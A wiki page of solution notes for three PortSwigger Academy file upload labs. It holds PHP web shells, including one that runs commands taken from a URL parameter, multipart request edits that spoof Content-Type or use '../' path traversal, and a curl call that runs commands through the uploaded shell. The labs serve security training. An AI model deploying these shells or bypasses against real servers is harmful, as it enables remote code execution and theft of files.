File upload vulnerabilities - gachikuku/portswigger GitHub Wiki
Apprentice lab:
Remote code execution via web shell upload
Apprentice lab:
Remote code execution via web shell upload
This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret
. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Upload a sample image. (1px ideally).
- Locate the file that has been uploaded. (i.e. files/avatars/image.png)
- Analyse the POST request made and the GET request of the image.
- Change the POST request and see it reflect to the GET request.
- Read secret and submit.
- Log in as
Apprentice lab:
Web shell upload via Content-Type restriction bypass
Apprentice lab:
Web shell upload via Content-Type restriction bypass
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret
. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Upload a sample image. (1px ideally).
- Locate the file that has been uploaded. (i.e. files/avatars/image.png)
- Analyse the POST request made and the GET request of the image.
-
D
uplicate thePOST /my-account/avatar
request. - On a duplicated POST request press
ea
to open and edit the request body. - Edit the binary file
-----------------------------110021003736074269862781810296 Content-Disposition: form-data; name="avatar"; filename="exploit.php" - Content-Type: text/plain + Content-Type: image/png <?php echo file_get_contents('/home/carlos/secret'); ?> -----------------------------110021003736074269862781810296 Content-Disposition: form-data; name="user" wiener -----------------------------110021003736074269862781810296 Content-Disposition: form-data; name="csrf" XdvzQpIziILt34TaP4GY1nLyFeFXhMhR -----------------------------110021003736074269862781810296--
- Visit
/files/avatars/exploit.php
.
- Log in as
Practitioner lab:
Web shell upload via path traversal
Practitioner lab:
Web shell upload via path traversal
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret
. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Upload an sample image.
- Right click to the uploaded image to find out where it was uploaded
/files/avatars/image.png
. -
Duplicate the POST request to upload a webshell
<?php system($_GET['cmd']); ?>
. -
ea to open and edit the request-body.
-----------------------------33535606952856614791034043163 - Content-Disposition: form-data; name="avatar"; filename="image.php" + Content-Disposition: form-data; name="avatar"; filename="../image.php" Content-Type: image/png <?php system($_GET['cmd']); ?> -----------------------------33535606952856614791034043163 Content-Disposition: form-data; name="user" wiener -----------------------------33535606952856614791034043163 Content-Disposition: form-data; name="csrf" k6OY4oqfcG4TmjX5toKp6DmEgUiW8cBi -----------------------------33535606952856614791034043163--
- Notice the GET request of the uploaded image endpoint does not reflect a change
- Trying stuff is encouraged.
..%2Fimage.php
works! - Verify we have a shell upload with
curl "https://uuid.web-security-academy.net/files/avatars/../image.php?cmd=whoami"
- Exfiltrate flag with
cmd=cat%20/home/carlos/secret
.
- Log in as